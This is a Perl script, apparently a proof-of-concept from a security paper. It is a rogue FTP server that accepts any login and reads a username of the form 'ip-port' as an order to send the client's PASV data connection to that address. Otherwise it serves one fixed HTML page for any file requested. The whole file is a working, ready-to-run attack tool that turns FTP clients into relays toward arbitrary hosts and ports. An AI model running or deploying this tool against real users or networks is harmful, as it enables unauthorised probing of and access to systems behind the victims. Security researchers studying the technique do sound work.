#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;

my $VERSION = "1.0";
my $usage = <<USAGE;
ftp-server.pl v$VERSION ( http://bindshell.net/papers/ftppasv )

Usage: $0 local-ip homepage.html

    local-ip         Local IP address which is reachable by clients
    homepage.html    Default page to return (see below)

Description:

FTP server which returns PASV responses based on the username supplied.  
Any username can be used to log into the server.

- If the username looks like "ip-port" (e.g. 10.0.0.1-25), the PASV
  response will direct the client to the specified IP address and
  port.

- If the username doesn't look like "ip-port" a normal PASV response
  will be returned and the file given as argument 2 (e.g. homepage.html)
  will returned to the client regardless of the file they request.

USAGE

# Check we're root or we won't be able to bind to port 21
if ($> != 0) {
	print "ERROR: EUID is not 0.  Server must be run as root to bind to port 21\n";
	exit 1;
}

# Process command line args
my $this_ftp_server_ip = shift or die $usage;
my $file = shift or die $usage;

# Bind to server port
my $bind_address = $this_ftp_server_ip;
my $bind_port = 21;
my $s = IO::Socket::INET->new( 
		LocalAddr => $bind_address, 
		LocalPort => $bind_port, 
		Proto     => 'tcp', 
		Listen    => 1, 
		ReuseAddr => 1) 
	or die "ERROR: Can't bind to $bind_address:$bind_port: $@\n";

# Declare variables
my $client;
my $peerhost;
my $peerport;
my $redirect_ip;
my $redirect_port;
my $pasv_string;
my $reply;
my $listen_sock;
my $file_contents;
my @pasv_ports = (10000..110000);
$SIG{CHLD} = "IGNORE"; # autoreap

# Open homepage file and read contents
open (FILE, "<$file") or die "Can't open file $file: $!\n";
{
local undef $/;
$file_contents = <FILE>;
}
close FILE;

# Print usage info
print "Starting ftp-server.pl v$VERSION ( http://bindshell.net/papers/ftppasv )\n";
print "Binding to interface .... $bind_address\n";
print "Using homepage .......... $file\n";
print "\n";
print "Waiting for incoming connection...\n";

# Parent process will process incoming connections forever
while (1) {
	$client = $s->accept();
	$peerhost = $client->peerhost();
	$peerport = $client->peerport();
	my $child_pid = fork;
	if ($child_pid) {
		printf "[Parent] Got connection from $peerhost:$peerport... Spawned process $child_pid to handle connection\n";
	} else {
		last;
	}
}

# Child
select (undef, undef, undef, 0.1); # wait for partent to print "got connection" message
sendit("220 FTP PASV Demo Server v$VERSION\r\n");

while (1) {
	$reply = recvit();

	if ($reply =~ /^USER\s+(\d+\.\d+\.\d+\.\d+)-(\d+)/i) {
		# Hopefully we'll receive a line that looks like:
		# USER 127.0.0.2-11

		$redirect_ip = $1;
		$redirect_port = $2;
		$pasv_string = calc_pasv_string($redirect_ip, $redirect_port);

		sendit("331 Please specify the password.\r\n");
		#sendit("230 Login successful.\r\n");
		next;
	}
	if ($reply =~ /^USER /i) {
		# We shouldn't need this if we hit the above "USER" case
		# This code is only hit when the client request the homepage

		sendit("331 Please specify the password.\r\n");
		# sendit("230 Login successful.\r\n");
		next;
	}
	
	if ($reply =~ /^AUTH SSL/i) {
		sendit("530 Please login with USER and PASS.\r\n");
		next;
	}
	
	if ($reply =~ /^PASS /i) {
		sendit("230 Login successful.\r\n");
		next;
	}
	
	if ($reply =~ /^SYST/i) {
		sendit("215 UNIX Type: L8\r\n");
		next;
	}
	
	if ($reply =~ /^PASV/i) {
		# If pasv_string is defined then the client sent a username like
		# 10.0.0.1-25, so we need to return a custom PASV response.
		if (defined($pasv_string)) {
			sendit("227 Entering Passive Mode ($pasv_string)\r\n");

		# If pasv_string isn't defined, the client has requested the 
		# homepage.
		} else {
			# Fork so child can handle request to pasv port
			unless (fork) {
				print "[PID $$] Handling incoming request to PASV port\n";

				# Find a free port to bind to
				my $pasv_port;
				foreach $pasv_port (@pasv_ports) {
					last if ($listen_sock = IO::Socket::INET->new(
									LocalAddr => $bind_address, 
									LocalPort => $pasv_port, 
									Proto     => 'tcp', 
									Listen    => 1, 
									ReuseAddr => 1
									)
								);
				}
	
				unless ($listen_sock) {
					die "[PID $$] Couldn't bind to a port\n";
				}
	
				print "[PID $$] Bound to " . $listen_sock->sockport . "\n";
	
				# Send PASV response
				my $pasv_string = calc_pasv_string($this_ftp_server_ip, $listen_sock->sockport);
				sendit("227 Entering Passive Mode ($pasv_string)\r\n");

				handle_pasv_request($listen_sock);
				myexit();
			}
		}
		next;
	}
	
	if ($reply =~ /^PWD/i) {
		sendit("257 \"/\"\r\n");
		next;
	}
	
	if ($reply =~ /^MODE/i) {
		sendit("504 Bad MODE command.\r\n");
		next;
	}

	if ($reply =~ /^CWD .*htm/i) {
		sendit("550 Failed to change directory.\r\n");
		next;
	}

	if ($reply =~ /^CWD/i) {
		sendit("250 Directory successfully changed.\r\n");
		next;
	}

	if ($reply =~ /REST (\d+)/i) {
		my $pos = $1;
		sendit("350 Restart position accepted ($pos).\r\n");
		next;
	}

	if ($reply =~ /^TYPE I/i) {
		sendit("200 Switching to Binary mode.\r\n");
		next;
	}

	if ($reply =~ /^TYPE/i) {
		sendit("200 Switching to ASCII mode.\r\n");
		next;
	}

	if ($reply =~ /^RETR (.*)/i) {
		my $filename = $1;
		chomp $filename; $filename =~ s/\x0d//;
		sendit("150 Opening BINARY mode data connection for $filename (" . (-s $file) . " bytes).\r\n");
		sendit("226 File send OK.\r\n");
		myexit();
		next;
	}
	
	if ($reply =~ /^MDTM/i) {
		sendit("213 0123456789123456789\r\n");
		next;
	}

	if ($reply =~ /^TYPE I/i) {
		sendit("200 Switching to Binary mode.\r\n");
		next;
	}

	if ($reply =~ /^EPSV/i) {
		sendit("500 eh\r\n");
		next;
	}

	if ($reply =~ /^EPRT/i) {
		sendit("500 Error\r\n");
		next;
	}

	if ($reply =~ /^PORT/i) {
		sendit("500 Error\r\n");
		next;
	}

	if ($reply =~ /^SIZE/i) {
		sendit("213 " . (-s $file) . "\r\n");
		next;
	}

	if ($reply =~ /^quit/i) {
		myexit();
	}

	if ($reply =~ /^LIST/i) {
		sendit("150 Here comes the directory listing.\r\n");
		sleep 5;
		sendit("226 Directory send OK.\r\n");
		next;
	}

	print "ERROR: unmatched reply\n";
	myexit();
}

sub sendit {
	my $string = shift;
	print "[PID $$] SEND: $string";
	unless (defined($client->send($string))) {
		print "[PID $$] ERROR on send\n";
		myexit();
	};
}

sub recvit {
	my $reply;
	unless (defined($client->recv($reply, 1500))) {
		print "[PID $$] ERROR on recv\n";
		myexit();
	}
	print "[PID $$] RECV: $reply";
	return $reply;
}

sub myexit {
	print "[PID $$] Exiting\n";
	exit 0;
}

sub calc_pasv_string {
	my ($ip, $port) = @_;
	my $pasv_string;

	# Calculate PASV response for redirect
	$pasv_string = $ip;
	$pasv_string =~ s/\./,/g;
	$pasv_string = "$pasv_string," . int($port / 256);
	$pasv_string = "$pasv_string," . ($port % 256);

	return $pasv_string;
}

sub handle_pasv_request {
	my $sock = shift;
	my $client = $sock->accept();
	my $peerhost = $client->peerhost();
	my $peerport = $client->peerport();
	print "[PID $$] Got connection from $peerhost:$peerport.  Sending html\n";
	print $client $file_contents;
}

